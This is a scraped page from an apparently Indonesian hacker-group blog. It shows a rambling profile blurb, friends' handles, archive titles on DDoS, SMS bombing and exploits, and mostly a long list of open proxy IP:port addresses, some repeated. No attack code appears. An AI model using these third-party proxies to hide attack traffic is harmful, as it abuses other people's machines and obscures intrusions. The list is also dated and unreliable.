I'm not a hacker or something else , i probably going to end up spending the rest of my life alone. You will just have to face them and learn from them. I believe everything happens for a reason. I like to meet new people. The thought of being entirely new to someone is beautiful. If you would like to get to know me feel free to attempt to do so. If we share similar interest and our personalities connect 
good with one another then we might end up good friends. But if you are fake in anyway I can guarantee you will annoy me and dislike me. I have every intention to lie and make up some heroic story about my life.
      



      
      

      

      
[ Friends Link ]
      

      
[ chat with me ]

      
      

      


      

      


^rumput_kering^

aaezha

bobyhikaru

vyc0d

yadoy666

K-159

omicorn

RomeO

senot

Jericho

solpot

str0ke



      









            
      
    

      

      
[ archives ]
      


      
[ Notices ]

    
    

      


      

By title


DDOS




Reversing JavaScript Shellcode




DDOS on Symbian




SmS bomb




Again, Indonesia Admin Site System Can not Fix The Vulnerability




cheddar_bay xpl ^_^




Voip Hacking




Maraknya Malware Tahun ini




AMANKAH ANDA ???




analisa mikrotik




ASTALAVISTA DI HAJAR HABIS - HABISAN


By month

2002.03

2002.12

2005.12

2008.11

2009.02

2009.03

2009.04

2009.05

2009.06

2009.07

2009.08

2009.09

2009.10

2009.11

2009.12

2010.01

2010.03
				
      

      


129.240.67.16:3128
210.99.208.40:1080
128.112.139.82:3124
130.149.49.26:3124
189.17.207.17:1080
200.251.62.66:3128
201.74.235.65:6588
160.97.36.70:8000
200.168.86.215:1080
201.43.73.135:1080
200.196.118.215:3128
201.210.208.225:1080
200.140.137.91:80
24.248.158.129:1080
200.222.64.226:1080
61.61.132.129:8899
200.47.27.40:1080
200.144.17.34:3128
202.103.242.100:1080
222.221.6.144:1080
195.65.252.11:8080
210.207.65.108:1080
201.62.114.3:1080
129.105.44.253:8888
200.43.67.48:8080
201.218.243.115:8080
12.214.32.41:21978
194.27.44.27:4480
128.223.8.112:3124
200.175.243.129:80
200.168.150.181:3128
189.22.168.10:80
201.252.213.245:1080
201.18.52.154:6588
128.59.20.226:3127
200.85.39.18:80
143.215.129.115:3124
193.136.122.36:80
200.169.155.105:6588
200.141.135.244:3128
202.105.182.87:8204
59.94.17.133:1080
82.147.163.13:1080
202.106.143.16:80
200.129.25.3:8080
194.199.33.120:80
201.253.9.114:1080
202.106.143.254:80
129.109.210.18:80
201.53.126.84:1080
218.30.119.114:4408
200.198.43.8:80
134.002.172.252:3124
60.191.79.123:1080
143.215.129.117:3128
123.176.6.179:1080
67.48.233.231:1080
80.5.184.242:1080
193.174.67.186:3127
200.207.217.151:1080
193.120.142.22:80
200.21.15.122:80
147.46.240.165:3124
218.234.77.254:1080
201.234.240.228:3128
162.105.18.230:1080
61.17.188.201:1080
192.197.121.002:3128
124.128.158.36:8000
130.149.49.26:3128
201.46.38.48:1080
200.123.157.130:80
123.232.9.185:8080
60.10.134.103:1080
201.43.6.8:1080
58.251.49.226:1080
198.133.224.145:3127
160.94.220.242:3124
201.245.189.55:6588
128.238.88.65:3127
59.52.254.224:1080
189.46.236.75:1080
147.163.102.132:80
201.243.12.228:8080
168.73.240.230:80
200.177.164.21:1080
200.106.222.115:6588
200.10.237.25:80
200.208.42.126:3128
221.135.135.206:1080
193.227.173.202:1080
194.63.222.241:80
195.96.248.134:1080
222.82.16.200:1080
128.220.231.3:3124
199.247.235.29:80
200.226.137.10:80
193.239.255.181:3128
189.33.114.10:6588
201.63.209.50:3128
159.148.94.130:1080
193.167.182.132:3124
87.228.126.51:1080
200.241.164.67:80
201.36.164.157:6588
201.73.208.18:1080
200.198.212.134:80
138.23.204.133:3128
200.204.108.238:6588
189.3.83.7:1080
201.88.202.122:8080
124.146.168.42:80
200.193.222.104:3128
129.22.148.183:8896
200.68.73.193:443
200.206.193.13:6588
165.194.97.39:80
200.42.228.234:8080
165.228.133.10:3128
121.247.112.138:1080
64.93.237.75:1080
58.211.0.113:1080
128.208.004.197:3127
201.6.140.10:6588
201.252.62.182:1080
193.136.227.164:3124
200.44.159.106:8080
192.87.100.9:80
134.2.172.252:3127
148.243.214.14:80
200.153.48.98:6588
82.7.53.247:1080
151.198.230.253:8080
200.204.201.48:8080
143.215.129.115:3128
125.18.15.99:6588
201.43.8.76:6588
124.133.37.247:8080
131.123.73.133:1080
200.164.174.164:3128
196.15.161.193:3128
200.181.30.50:3128
195.234.173.10:80
200.21.91.106:8080
222.170.243.158:1080
200.251.69.131:3128
200.159.121.4:8080
128.114.160.240:80
200.217.236.124:3128
128.113.226.235:3127
198.133.219.158:80
202.106.143.114:80
200.35.81.165:80
59.93.246.93:1080
201.53.43.133:8575
60.21.161.73:1080
12.149.212.1:80
201.252.90.228:1080
118.98.163.242:3128
189.54.79.33:6588
125.99.26.225:6588
201.134.193.90:3837
59.93.214.206:1080
200.171.237.254:8204
189.7.49.6:1080
202.106.143.1:80
193.95.68.196:80
190.95.136.179:6588
218.13.181.78:1080
189.19.3.43:1080
200.72.162.50:1080
200.168.82.216:8080
202.106.143.27:80
124.128.224.2:1080
193.28.153.27:84
130.136.254.21:3127
200.210.221.32:3128
123.232.108.98:1080
200.202.228.242:3128
200.142.126.126:3128
147.102.3.101:3128
194.151.25.148:8080
195.224.106.199:1080
222.77.84.6:1080
218.6.144.217:1080
200.206.95.97:6588
200.171.95.8:6588
200.21.15.123:80
189.20.228.98:3128
200.67.31.244:3128
202.106.143.138:80
202.106.143.201:80
212.35.71.98:1080
195.138.96.136:80
190.54.19.37:1080
222.83.228.17:81
216.48.80.14:3124
142.103.2.1:3127
131.179.50.70:3128
143.248.139.171:3124
201.48.209.1:80
132.187.230.2:3124
143.215.131.199:3128
71.81.136.52:8085
24.211.81.113:8085
41.232.158.251:8080
195.130.121.204:3127
203.178.133.10:3128
201.82.175.166:3128
142.150.238.12:3124
169.229.50.16:3127
132.170.3.32:3128
129.10.120.194:3124
125.91.96.142:808
173.29.143.141:8085
193.167.187.188:3127
141.24.33.192:3128
132.187.230.1:3124
165.228.132.11:80
89.244.130.94:3128
120.50.56.241:3128
89.186.169.125:3128
187.5.156.13:8080
68.98.251.94:8118
128.4.36.12:3124
186.56.68.6:8080
80.98.201.218:8000
221.130.13.211:80
129.242.19.197:3127
200.163.68.34:3128
128.193.33.8:3128
65.35.117.160:8085
72.36.112.74:3127
217.12.249.210:3128
210.243.157.250:3128
125.163.77.57:3128
143.225.229.238:3128
195.113.161.83:3124
171.66.3.181:3124
137.226.138.156:3128
169.229.50.7:3128
63.240.26.232:443
142.150.3.77:3124
198.7.242.41:3128
140.112.42.159:3127
208.43.64.239:808
200.14.126.36:6588
147.83.30.167:3128
125.163.78.216:3128
134.226.52.34:3124
190.41.120.218:8080
118.96.30.107:8080
150.65.32.68:3124
202.71.98.201:3128
35.9.27.26:3127
219.240.36.173:4480
130.104.72.200:3128
169.229.50.13:3127
200.222.82.251:3128
193.147.162.166:3128
97.85.134.130:8085
152.15.98.226:3124
203.172.238.164:8080
200.117.240.56:8080
151.204.42.140:8080
93.180.73.249:3128
200.245.35.131:80
169.229.50.16:3124
193.167.187.187:3124
141.24.249.130:3128
164.73.47.242:3124
212.174.246.12:8080
128.111.52.62:3127
190.187.41.254:3128
69.162.67.217:9697
201.116.58.221:6588
202.105.182.13:80
188.24.45.241:6588
210.21.63.141:8080
133.1.74.162:3128
200.72.250.50:3128
196.12.145.125:80
137.165.1.115:3128
158.130.6.253:3128
200.31.42.3:80
192.41.135.218:3127
196.42.47.17:3128
80.95.160.198:444
202.93.128.2:8080
165.228.128.11:80
58.246.76.76:8080
221.212.177.97:1080
170.140.119.69:3124
137.226.138.156:3127
195.116.60.2:3128
211.108.62.230:8081
216.157.31.58:80
213.73.40.105:3124
128.232.103.202:3124
120.50.57.249:3128
196.27.118.8:3128
194.44.249.7:3128
155.98.35.5:3124
192.115.104.88:80
129.242.19.196:3127
187.4.115.42:6588
129.242.19.197:3128
134.34.246.5:3124
143.215.131.197:3124
187.2.146.102:3128
61.28.162.234:3128
129.107.35.131:3124
222.83.228.17:81
121.10.174.122:8082
147.102.224.228:3127
150.65.32.66:3127
128.31.1.17:3124
193.30.164.3:80
219.90.91.69:8080
140.112.42.159:3124
133.1.16.172:3127
198.133.224.146:3124
118.34.163.145:3128
189.44.29.226:3128
163.221.11.71:3128
200.48.170.215:3128
128.112.139.56:3127
143.215.131.198:3124
201.80.187.222:6588
118.175.22.69:8080
140.119.164.84:3128
156.17.10.52:3127
211.155.231.208:80
128.232.103.203:3128
220.241.81.134:80
132.252.152.194:3127
189.32.71.217:3128
81.189.106.138:8080
169.229.50.16:3128
129.108.202.11:3124
222.124.132.219:80
195.242.99.89:80
122.155.0.193:80
195.67.149.70:64891
200.207.177.130:3128
192.33.90.68:3127
94.23.51.50:8118
129.108.202.10:3128
147.102.224.227:3127
143.215.131.197:3128
70.36.96.179:3128
169.229.50.9:3127
128.227.56.81:3127
80.74.110.149:80
68.203.237.216:8085
219.141.127.239:443
61.247.32.70:8080
130.192.157.131:3124
200.242.95.171:6588
98.163.127.29:8085
122.144.1.227:8080
76.99.105.108:80
144.206.66.56:3127
125.41.181.59:8080
137.165.1.115:3127
140.119.164.85:3124
141.24.33.192:3127
61.247.33.107:8080
202.105.182.33:80
195.116.60.2:3127
94.27.77.4:8080
141.24.33.162:3127
71.226.180.143:8085
130.136.254.22:3127
129.10.120.194:3128
133.1.16.172:3128
187.5.91.82:8080
189.4.14.89:3128
194.36.10.156:3124
169.229.50.13:3128
119.255.1.71:3128
131.247.2.241:3128
193.167.187.188:3124
222.185.242.90:8080
192.43.193.72:3124
200.59.35.10:8080
150.65.32.66:3124
129.24.211.26:3128
129.242.19.196:3128
140.114.79.233:3127
128.31.1.16:3124
187.9.217.74:3128
165.229.203.100:8000
128.208.4.199:3128
193.63.58.70:3124
89.28.120.95:3128
133.11.240.56:3124
189.124.129.174:3128
124.207.168.48:808
131.246.191.42:3127
200.93.232.82:8080
163.29.225.250:8080
200.143.139.108:3128
128.227.56.82:3124
173.17.162.147:8085
148.245.191.3:80
35.9.27.26:3128
149.169.227.131:3128
164.73.47.244:3124
198.133.224.149:3128
169.229.50.4:3127
217.21.115.189:8080
121.14.158.76:80
120.28.64.77:8080
200.165.140.104:6588
129.82.12.188:3127
200.103.48.34:3128
124.237.86.10:3128
129.82.12.187:3124
114.134.72.182:3128
216.93.253.150:80
118.98.212.58:3128
67.223.241.210:3128
125.69.69.87:8080
218.58.136.14:808
200.96.193.100:6588
140.119.164.85:3128
170.210.18.245:8080
152.3.138.4:3124
189.114.222.98:3128
211.139.120.69:10998
72.52.84.141:80
81.63.140.37:3128
131.247.2.242:3128
118.96.207.94:8080
142.150.238.12:3128
136.145.115.194:3124
193.157.115.250:3128
125.163.238.199:8080
138.251.214.78:3128
218.241.81.219:8080
222.221.6.144:808
221.130.13.233:80
121.8.142.59:8080
189.89.185.227:6588
143.215.131.199:3124
155.98.35.5:3127
129.82.12.187:3128
194.9.85.141:80
150.65.32.68:3127
82.131.192.212:8080
218.90.171.249:8080
77.71.0.158:3128
125.165.172.90:3128
131.179.50.70:3127
143.205.172.11:3124
131.246.191.42:3124
200.192.210.98:6588
146.57.249.99:3128
195.229.62.157:80
200.76.47.4:3128
192.33.90.68:3128
187.19.48.12:80
200.207.126.232:3128
189.60.195.52:3128
67.166.0.111:8085
149.169.227.129:3127
195.242.99.91:80
122.70.146.53:808
91.121.200.228:3128
193.205.215.74:3127
221.130.13.199:80
120.28.64.77:80
120.28.64.78:8080
207.44.255.171:3128
128.59.20.228:3124
190.139.101.154:8080
125.165.48.74:8080
82.247.65.47:80
130.104.72.200:3124
221.130.13.232:80
173.27.165.50:8085
211.141.86.152:8080
218.201.21.177:80
200.168.234.5:8080
123.235.127.250:8080
118.97.109.186:8080
120.28.64.94:8080
134.121.64.7:3124
221.238.17.245:8080
92.45.23.236:80
132.252.152.193:3124
152.3.138.5:3128
202.105.182.12:80
128.208.4.99:3128
128.208.4.199:3127
128.238.88.64:3127
128.187.223.211:3127
128.42.142.41:3124
194.44.117.73:8080
195.113.161.82:3124
131.179.50.72:3128
131.247.2.247:3127
163.221.11.72:3128
212.113.5.2:80
218.64.180.170:8080
125.160.247.34:8080
124.228.83.63:8089
59.42.250.145:808
128.227.56.82:3127
122.155.0.142:3128
143.205.172.11:3128
128.4.36.11:3128
130.192.157.132:3128
120.50.31.141:3128
118.98.194.123:8080
72.36.112.71:3128
219.128.102.194:80
189.30.135.98:3128
164.77.170.68:8080
129.10.120.193:3124
205.188.101.73:80
169.235.24.232:3127
189.122.101.212:8080
79.148.249.246:8080
169.229.50.8:3127
129.10.120.193:3128
190.41.142.157:8080
129.82.12.188:3124
143.225.229.236:3124
123.233.121.164:80
152.3.138.5:3124
131.246.191.42:3128
128.227.56.81:3124
171.66.3.182:3128
68.34.79.85:80
119.70.40.102:8080
221.202.118.17:808
210.21.12.94:8080
99.232.51.124:8085
187.4.255.50:8080
194.36.10.156:3127
189.75.70.245:3128
125.14.35.130:8080
192.41.135.219:3127
200.141.202.162:8080
203.197.37.46:6588
133.1.74.162:3127
203.144.133.4:8080
186.125.60.3:3128
173.24.21.238:8085
130.136.254.22:3124
138.246.99.249:3124
59.165.185.242:3128
200.181.201.197:3128
62.215.195.85:80
141.76.45.17:3128
67.62.67.182:8080
92.61.37.103:3128
203.110.245.250:80
202.164.208.50:8080
129.108.202.11:3127
210.51.14.197:80
220.194.55.244:3128
128.31.1.15:3124
67.186.74.57:8085
74.54.156.73:80
128.220.247.28:3128
133.11.240.56:3128
187.4.255.50:80
128.151.65.101:3128
121.14.158.65:80
132.187.230.1:3128
193.136.124.226:3128
200.30.101.114:8080
155.246.12.163:3127
193.205.215.75:3128
189.144.97.205:80
221.214.102.99:80
118.96.147.31:3128
120.29.157.46:3128
169.229.50.10:3124
200.93.238.170:8080
125.247.231.129:8080
132.239.17.226:3124
149.169.227.129:3124
218.28.99.146:3128
119.161.129.239:80
202.105.182.20:80
193.55.112.41:3124
203.147.4.68:8080
72.149.178.74:8000
142.150.238.13:3124
203.178.133.11:3127
218.56.64.3:80
128.208.4.99:3124
169.229.50.11:3128
213.131.1.102:3128
210.42.140.5:3128
117.103.11.18:8080
201.225.226.68:8080
128.208.4.198:3128
118.98.200.101:3128
118.96.110.41:3128
193.63.58.71:3124
58.147.64.199:3128
201.248.138.33:3128
202.153.41.36:8080
128.8.126.79:3128
193.191.148.227:3128
213.27.191.118:80
195.160.188.163:80
97.100.189.100:8085
131.247.2.241:3124
208.110.73.34:8383
202.194.202.7:808
163.221.11.72:3124
218.104.180.228:808
201.12.130.227:8080
171.66.3.181:3127
140.119.164.84:3124
131.175.17.9:3128
222.92.116.39:80
128.111.52.62:3124
60.172.179.14:9000
193.24.25.226:3128
189.56.100.42:3128
124.138.92.206:14124
195.116.60.2:3124
122.17.74.118:8080
221.130.13.207:80
201.12.3.202:8080
221.233.134.87:8080
218.14.227.197:3128
212.170.197.122:8080
58.137.8.85:8080
128.6.192.158:3128
194.36.10.156:3128
128.220.247.28:3124
207.44.255.168:80
128.151.65.102:3127
81.47.119.134:8080
218.201.21.158:80
143.225.229.236:3127
221.130.13.206:80
58.61.149.211:3128
140.122.127.250:3128
114.127.246.36:80
169.229.50.11:3124
210.192.17.116:3128
221.224.206.86:8080
192.42.43.23:3128
132.239.17.225:3128
164.73.47.244:3127
193.147.162.166:3127
200.48.13.37:3128
119.70.40.101:8080
137.165.1.114:3128
189.8.36.90:80
164.77.170.67:8080
134.151.255.180:3124
129.107.35.132:3128
58.240.237.32:80
59.51.60.169:808
200.220.140.226:3128
171.66.3.181:3128
196.202.252.244:80
216.23.162.169:80
158.130.6.253:3124
140.114.79.233:3124
193.63.58.70:3128
124.172.110.158:80
129.82.12.188:3128
132.239.17.225:3124
152.3.138.4:3127
66.98.212.79:8888
69.51.10.205:80
208.66.171.217:8080
130.192.86.30:3127
222.124.219.199:3128
134.34.246.4:3124
200.44.217.52:8080
193.205.215.75:3124
213.137.130.166:8080
203.82.86.36:80
121.14.158.75:80
81.107.53.61:80
192.33.90.67:3124
131.247.2.247:3124
124.138.92.206:8338
140.117.178.234:80
203.172.248.170:8080
147.83.30.167:3124
146.57.249.99:3124
61.93.124.15:808
134.226.52.35:3124
89.189.85.68:80
200.244.21.26:8080
79.160.222.20:8080
200.153.184.234:3128
118.98.169.27:8080
129.107.35.131:3128
169.229.50.10:3128
169.229.50.5:3128
219.43.150.92:8080
118.96.121.70:3128
129.10.120.194:3127
190.144.127.202:3128
138.100.12.148:3124
198.133.224.146:3127
201.144.26.158:3128
220.173.139.172:8080
68.230.199.107:8085
171.66.3.182:3127
130.104.72.201:3127
192.43.193.72:3128
115.108.192.170:3128
221.130.13.208:80
155.246.12.164:3124
200.90.191.58:3128
115.125.87.90:8080
218.206.7.130:3128
125.21.227.206:80
141.24.249.129:3127
141.213.4.202:3128
130.136.254.21:3128
190.39.195.72:6588
128.151.65.102:3128
121.96.183.93:1080
137.226.138.154:3124
122.226.136.118:8080
70.36.96.181:3128
169.229.50.4:3128
192.42.43.23:3127
193.136.124.226:3127
137.226.138.154:3127
60.251.221.98:3128
198.163.152.230:3127
200.160.244.246:6588
72.36.112.74:3128
202.54.61.99:8080
192.41.135.219:3124
152.3.138.4:3128
190.41.188.38:3128
131.130.32.155:3128
141.24.249.130:3127
88.191.16.55:3128
69.46.25.18:80
78.28.206.248:8080
128.10.19.52:3128
91.201.116.70:3128
192.33.210.16:3128
198.7.242.42:3128
196.202.195.114:3128
169.229.50.10:3127
141.213.4.202:3124
211.144.106.58:80
211.140.138.39:8080
212.117.164.17:80
128.208.4.99:3127
193.111.120.47:6588
200.67.31.246:3128
155.246.12.164:3128
128.59.20.228:3127
203.178.133.11:3124
192.43.193.72:3127
131.114.53.188:3128
203.82.86.113:80
130.37.198.244:3127
65.184.109.98:8085
128.195.54.161:3124
131.247.2.242:3124
125.62.210.190:8080
169.229.50.14:3127
193.52.195.6:80
128.111.52.62:3128
202.143.129.200:8080
130.104.72.200:3127
130.104.72.201:3128
219.148.200.202:808
210.43.128.18:3128
128.232.103.203:3124
141.24.249.129:3124
59.152.238.51:8080
189.6.20.112:3128
195.56.55.206:3128
71.203.32.181:9090
96.11.145.212:8085
222.86.132.20:808
130.75.87.83:3124
118.96.134.8:8080
88.2.237.249:1080
163.221.11.71:3124
148.233.239.23:3128
69.51.10.203:80
128.151.65.102:3124
69.64.58.3:3128
160.36.57.173:3128
132.187.230.2:3128
189.166.116.138:6588
133.1.74.163:3128
190.81.172.124:3128
217.174.98.198:8080
170.140.119.70:3127
221.130.13.200:80
221.214.27.253:808
128.6.192.156:3128
200.129.25.14:8080
132.252.152.194:3124
222.240.208.14:808
200.70.47.139:3128
194.36.10.154:3128
130.37.198.244:3128
203.122.61.29:80
203.82.86.10:80
189.47.174.138:80
128.187.223.212:3128
143.205.172.12:3128
76.111.21.193:3128
79.187.48.90:80
200.69.105.80:3128
120.50.57.243:3128
164.78.252.25:80
201.75.39.242:3128
202.95.169.175:1080
143.225.229.236:3128
134.121.64.4:3124
219.240.36.175:4480
201.47.170.45:3128
169.229.50.7:3124
160.36.57.173:3127
213.73.40.105:3128
212.113.5.21:80
128.227.56.82:3128
138.246.99.249:3128
138.100.12.148:3128
189.80.16.52:3128
156.17.10.52:3124
200.148.209.148:3128
202.105.182.16:80
202.143.146.205:8080
195.216.213.6:8080
143.248.139.55:3124
131.175.17.10:3124
130.192.86.30:3124
118.98.214.236:8080
124.6.186.38:3128
118.98.215.130:8080
125.160.73.28:8080
163.221.11.72:3127
120.28.64.85:8080
221.8.74.211:22530
132.252.152.193:3127
130.192.157.131:3128
193.157.115.250:3124
137.165.1.111:3128
189.21.126.3:8080
133.11.240.56:3127
83.64.115.103:6588
93.174.0.24:8080
138.246.99.249:3127
132.187.230.2:3127
200.186.35.22:3128
222.124.192.156:8080
200.103.48.35:3128
203.178.133.10:3127
218.75.100.114:8080
221.130.13.210:80
77.108.112.134:3128
217.237.177.6:8080
218.201.21.178:80
131.175.17.9:3124
192.33.90.67:3128
88.191.16.55:21
202.143.148.61:80
203.82.86.3:80
163.221.11.71:3127
169.235.24.232:3124
61.142.81.37:808
189.122.194.88:8080
213.203.241.210:80
202.69.104.90:8080
80.193.72.145:80
132.252.152.194:3128
128.220.247.29:3128
150.65.32.66:3128
218.201.21.175:80
72.36.112.74:3124
222.124.217.60:3128
169.229.50.5:3127
130.75.87.84:3124
142.103.2.2:3127
200.43.88.147:3128
155.98.35.5:3128
128.208.4.198:3127
216.217.98.100:8000
12.235.57.101:80
216.168.43.11:8000
152.3.138.5:3127
68.9.237.149:8085
58.56.108.114:80
155.98.35.7:3127
217.116.23.132:80
79.172.40.161:3128
217.70.56.161:8080
169.229.50.8:3128
198.163.152.230:3128
155.246.12.163:3128
80.237.140.233:8080
121.10.174.122:8082
147.102.224.228:3127
150.65.32.66:3127
128.31.1.17:3124
193.30.164.3:80
219.90.91.69:8080
140.112.42.159:3124
133.1.16.172:3127
198.133.224.146:3124
118.34.163.145:3128
189.44.29.226:3128
163.221.11.71:3128
200.48.170.215:3128
128.112.139.56:3127
143.215.131.198:3124
201.80.187.222:6588
118.175.22.69:8080
140.119.164.84:3128
156.17.10.52:3127
211.155.231.208:80
128.232.103.203:3128
220.241.81.134:80
132.252.152.194:3127
189.32.71.217:3128
81.189.106.138:8080
169.229.50.16:3128
129.108.202.11:3124


       
    

  
  




  
  

    


      

      
elv1n4 Themes  v2.0.0  © 2009 by elv1n4 

    
  
www[dot]elv1n4.anti-sec[dot]org